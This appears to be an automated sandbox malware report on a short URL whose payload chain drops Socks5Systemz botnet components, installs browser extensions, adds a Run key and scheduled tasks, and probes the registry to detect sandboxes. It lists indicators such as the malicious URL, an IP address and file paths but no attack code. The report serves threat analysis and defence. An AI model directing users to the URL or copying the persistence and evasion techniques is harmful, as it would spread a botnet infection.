Overview
overview
10Static
static
1URLScan
urlscan
1https://ify.ac/1IZk
windows11-21h2-x64
10https://ify.ac/1IZk
windows10-1703-x64
8https://ify.ac/1IZk
windows10-2004-x64
10https://ify.ac/1IZk
windows11-21h2-x64
10https://ify.ac/1IZk
android-10-x64
1https://ify.ac/1IZk
android-11-x64
1https://ify.ac/1IZk
ubuntu-18.04-amd64
3https://ify.ac/1IZk
ubuntu-20.04-amd64
4https://ify.ac/1IZk
ubuntu-22.04-amd64
3https://ify.ac/1IZk
ubuntu-24.04-amd64
4Analysis
-
max time kernel
450s -
max time network
455s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
16-07-2024 05:11
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://ify.ac/1IZk
Resource
win11-20240709-en
Behavioral task
behavioral2
Sample
https://ify.ac/1IZk
Resource
win10-20240611-en
Behavioral task
behavioral3
Sample
https://ify.ac/1IZk
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
https://ify.ac/1IZk
Resource
win11-20240709-en
Behavioral task
behavioral5
Sample
https://ify.ac/1IZk
Resource
android-x64-20240624-en
Behavioral task
behavioral6
Sample
https://ify.ac/1IZk
Resource
android-x64-arm64-20240624-en
Behavioral task
behavioral7
Sample
https://ify.ac/1IZk
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral8
Sample
https://ify.ac/1IZk
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral9
Sample
https://ify.ac/1IZk
Resource
ubuntu2204-amd64-20240522.1-en
Behavioral task
behavioral10
Sample
https://ify.ac/1IZk
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
https://ify.ac/1IZk
Malware Config
Signatures
-
Detect Socks5Systemz Payload 1 IoCs
Processes:
resource yara_rule behavioral4/memory/4796-1086-0x0000000000CB0000-0x0000000000D52000-memory.dmp family_socks5systemz -
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 127 1712 rundll32.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpid process 2164 powershell.exe 4748 powershell.exe 5372 powershell.exe 1856 powershell.exe 5664 powershell.exe 5736 powershell.exe 5524 powershell.EXE -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
HrDttahkOdAABIRdJv.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion HrDttahkOdAABIRdJv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
eclbdtf.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\International\Geo\Nation eclbdtf.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_mp6kEAYHxE.tmpdjminoradequate.exeLPXAmkqoQNOEThly5U.exeAxnTxNXsNH.exeAxnTxNXsNH.tmpsetup.exesetup.exesetup.exefreevideoplayer.exesetup.exefreevideoplayer.exesetup.exe1nudJF05xlZjfK8yyP.exeHrDttahkOdAABIRdJv.exeAssistant_111.0.5168.25_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exeHrDttahkOdAABIRdJv.exesetup.exeeclbdtf.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exepid process 2664 setup_mp6kEAYHxE.tmp 2768 djminoradequate.exe 4688 LPXAmkqoQNOEThly5U.exe 2456 AxnTxNXsNH.exe 2020 AxnTxNXsNH.tmp 4808 setup.exe 3060 setup.exe 3452 setup.exe 4680 freevideoplayer.exe 564 setup.exe 4796 freevideoplayer.exe 4708 setup.exe 5564 1nudJF05xlZjfK8yyP.exe 5860 HrDttahkOdAABIRdJv.exe 5548 Assistant_111.0.5168.25_Setup.exe_sfx.exe 5756 assistant_installer.exe 5532 assistant_installer.exe 124 HrDttahkOdAABIRdJv.exe 2572 setup.exe 784 eclbdtf.exe 1664 Snetchball.exe 2412 Snetchball.exe 5640 Snetchball.exe 1276 Snetchball.exe 3484 Snetchball.exe 1428 Snetchball.exe 944 Snetchball.exe 5516 Snetchball.exe 4604 Snetchball.exe 6564 Snetchball.exe 5308 Snetchball.exe 7080 Snetchball.exe 7144 Snetchball.exe 7124 Snetchball.exe 5760 Snetchball.exe 796 Snetchball.exe 6288 Snetchball.exe 6232 Snetchball.exe 6328 Snetchball.exe 6340 Snetchball.exe 6488 Snetchball.exe 4456 Snetchball.exe 3176 Snetchball.exe 6780 Snetchball.exe 6808 Snetchball.exe 6848 Snetchball.exe 6840 Snetchball.exe 6376 Snetchball.exe 3460 Snetchball.exe 5592 Snetchball.exe 3728 Snetchball.exe 2896 Snetchball.exe 1496 Snetchball.exe 3508 Snetchball.exe 7104 Snetchball.exe 5212 Snetchball.exe 4180 Snetchball.exe 5496 Snetchball.exe 3364 Snetchball.exe 3056 Snetchball.exe 908 Snetchball.exe 2400 Snetchball.exe 5712 Snetchball.exe 7076 Snetchball.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_mp6kEAYHxE.tmpsetup.exeAxnTxNXsNH.tmpsetup.exesetup.exesetup.exesetup.exe1nudJF05xlZjfK8yyP.exeassistant_installer.exeassistant_installer.exesetup.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exerundll32.exepid process 2664 setup_mp6kEAYHxE.tmp 4808 setup.exe 2020 AxnTxNXsNH.tmp 3060 setup.exe 3452 setup.exe 564 setup.exe 4708 setup.exe 5564 1nudJF05xlZjfK8yyP.exe 5564 1nudJF05xlZjfK8yyP.exe 5564 1nudJF05xlZjfK8yyP.exe 5564 1nudJF05xlZjfK8yyP.exe 5564 1nudJF05xlZjfK8yyP.exe 5564 1nudJF05xlZjfK8yyP.exe 5564 1nudJF05xlZjfK8yyP.exe 5564 1nudJF05xlZjfK8yyP.exe 5564 1nudJF05xlZjfK8yyP.exe 5756 assistant_installer.exe 5756 assistant_installer.exe 5532 assistant_installer.exe 5532 assistant_installer.exe 2572 setup.exe 1664 Snetchball.exe 1664 Snetchball.exe 1664 Snetchball.exe 1664 Snetchball.exe 1664 Snetchball.exe 1664 Snetchball.exe 1664 Snetchball.exe 1664 Snetchball.exe 2412 Snetchball.exe 2412 Snetchball.exe 5640 Snetchball.exe 5640 Snetchball.exe 2412 Snetchball.exe 2412 Snetchball.exe 1276 Snetchball.exe 1276 Snetchball.exe 3484 Snetchball.exe 3484 Snetchball.exe 5640 Snetchball.exe 5640 Snetchball.exe 1276 Snetchball.exe 1276 Snetchball.exe 3484 Snetchball.exe 3484 Snetchball.exe 1428 Snetchball.exe 1428 Snetchball.exe 1428 Snetchball.exe 1428 Snetchball.exe 2412 Snetchball.exe 2412 Snetchball.exe 1712 rundll32.exe 2412 Snetchball.exe 2412 Snetchball.exe 2412 Snetchball.exe 5640 Snetchball.exe 2412 Snetchball.exe 5640 Snetchball.exe 1276 Snetchball.exe 1276 Snetchball.exe 3484 Snetchball.exe 3484 Snetchball.exe 3484 Snetchball.exe 3484 Snetchball.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 45.155.250.90 -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
setup.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
eclbdtf.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json eclbdtf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json eclbdtf.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
eclbdtf.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini eclbdtf.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
setup.exesetup.exedescription ioc process File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe -
Drops file in System32 directory 29 IoCs
Processes:
eclbdtf.exeHrDttahkOdAABIRdJv.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE eclbdtf.exe File created C:\Windows\system32\GroupPolicy\gpt.ini HrDttahkOdAABIRdJv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol HrDttahkOdAABIRdJv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 eclbdtf.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 eclbdtf.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 eclbdtf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 eclbdtf.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 eclbdtf.exe -
Drops file in Program Files directory 14 IoCs
Processes:
eclbdtf.exedescription ioc process File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi eclbdtf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak eclbdtf.exe File created C:\Program Files (x86)\hMiQKFvmPLjeC\EbAyrXh.dll eclbdtf.exe File created C:\Program Files (x86)\hMiQKFvmPLjeC\NdFpdWB.xml eclbdtf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja eclbdtf.exe File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\lRCdYHu.dll eclbdtf.exe File created C:\Program Files (x86)\UQtSSXvqU\oSfFis.dll eclbdtf.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak eclbdtf.exe File created C:\Program Files (x86)\UQtSSXvqU\DrWtGlG.xml eclbdtf.exe File created C:\Program Files (x86)\ezMWJXFFLyUn\HjYSTVn.dll eclbdtf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi eclbdtf.exe File created C:\Program Files (x86)\AMqhlrBDqRJU2\LoCSjfcFdirsy.dll eclbdtf.exe File created C:\Program Files (x86)\AMqhlrBDqRJU2\eobpTYI.xml eclbdtf.exe File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\SgeNsET.xml eclbdtf.exe -
Drops file in Windows directory 9 IoCs
Processes:
Snetchball.exeschtasks.exeschtasks.exeSnetchball.exeSnetchball.exeSnetchball.exeschtasks.exeschtasks.exeSnetchball.exedescription ioc process File opened for modification C:\Windows\SystemTemp Snetchball.exe File created C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job schtasks.exe File created C:\Windows\Tasks\MRTHivZIQsRdEanwm.job schtasks.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File created C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job schtasks.exe File created C:\Windows\Tasks\OcPshDNvhDnVmSv.job schtasks.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1420 2768 WerFault.exe djminoradequate.exe 1716 2768 WerFault.exe djminoradequate.exe 3716 2768 WerFault.exe djminoradequate.exe 4448 2768 WerFault.exe djminoradequate.exe 2060 2768 WerFault.exe djminoradequate.exe 132 2768 WerFault.exe djminoradequate.exe 3492 2768 WerFault.exe djminoradequate.exe 4584 2768 WerFault.exe djminoradequate.exe 1980 2768 WerFault.exe djminoradequate.exe 4252 2768 WerFault.exe djminoradequate.exe 888 2768 WerFault.exe djminoradequate.exe 1364 2768 WerFault.exe djminoradequate.exe 3968 2768 WerFault.exe djminoradequate.exe 2164 2768 WerFault.exe djminoradequate.exe 4712 2768 WerFault.exe djminoradequate.exe 984 2768 WerFault.exe djminoradequate.exe 4156 2768 WerFault.exe djminoradequate.exe 3552 2768 WerFault.exe djminoradequate.exe 2824 2768 WerFault.exe djminoradequate.exe 3184 2768 WerFault.exe djminoradequate.exe 5036 2768 WerFault.exe djminoradequate.exe 1776 2768 WerFault.exe djminoradequate.exe 3004 2768 WerFault.exe djminoradequate.exe 2100 2768 WerFault.exe djminoradequate.exe 1420 2768 WerFault.exe djminoradequate.exe 4712 2768 WerFault.exe djminoradequate.exe 2152 2768 WerFault.exe djminoradequate.exe 2004 2768 WerFault.exe djminoradequate.exe 1720 2768 WerFault.exe djminoradequate.exe 1212 2768 WerFault.exe djminoradequate.exe 4712 2768 WerFault.exe djminoradequate.exe 2016 2768 WerFault.exe djminoradequate.exe 2900 2768 WerFault.exe djminoradequate.exe 4928 2768 WerFault.exe djminoradequate.exe 2292 2768 WerFault.exe djminoradequate.exe 2028 2768 WerFault.exe djminoradequate.exe 2600 2768 WerFault.exe djminoradequate.exe 4844 2768 WerFault.exe djminoradequate.exe 1904 2768 WerFault.exe djminoradequate.exe 5448 2768 WerFault.exe djminoradequate.exe 5776 2768 WerFault.exe djminoradequate.exe 5936 2768 WerFault.exe djminoradequate.exe 6088 2768 WerFault.exe djminoradequate.exe 6136 2768 WerFault.exe djminoradequate.exe 3516 2768 WerFault.exe djminoradequate.exe 5264 2768 WerFault.exe djminoradequate.exe 400 2768 WerFault.exe djminoradequate.exe 5484 2768 WerFault.exe djminoradequate.exe 4820 2768 WerFault.exe djminoradequate.exe 5524 2768 WerFault.exe djminoradequate.exe 5712 2768 WerFault.exe djminoradequate.exe 5820 2768 WerFault.exe djminoradequate.exe 5320 2768 WerFault.exe djminoradequate.exe 408 2768 WerFault.exe djminoradequate.exe 1904 2768 WerFault.exe djminoradequate.exe 5300 2768 WerFault.exe djminoradequate.exe 240 124 WerFault.exe HrDttahkOdAABIRdJv.exe 5124 2768 WerFault.exe djminoradequate.exe 960 2768 WerFault.exe djminoradequate.exe 3636 2768 WerFault.exe djminoradequate.exe 5096 5860 WerFault.exe HrDttahkOdAABIRdJv.exe 3788 2768 WerFault.exe djminoradequate.exe 128 784 WerFault.exe eclbdtf.exe 6336 2768 WerFault.exe djminoradequate.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Aa7IDT2z\1nudJF05xlZjfK8yyP.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\Aa7IDT2z\1nudJF05xlZjfK8yyP.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Snetchball.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 Snetchball.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 Snetchball.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags Snetchball.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
Processes:
msedge.exeHrDttahkOdAABIRdJv.exerundll32.exemsedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName HrDttahkOdAABIRdJv.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS HrDttahkOdAABIRdJv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies Control Panel 9 IoCs
Processes:
Snetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exeHrDttahkOdAABIRdJv.exeeclbdtf.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" HrDttahkOdAABIRdJv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d0a76a3e-0000-0000-0000-d01200000000} eclbdtf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing eclbdtf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" eclbdtf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs 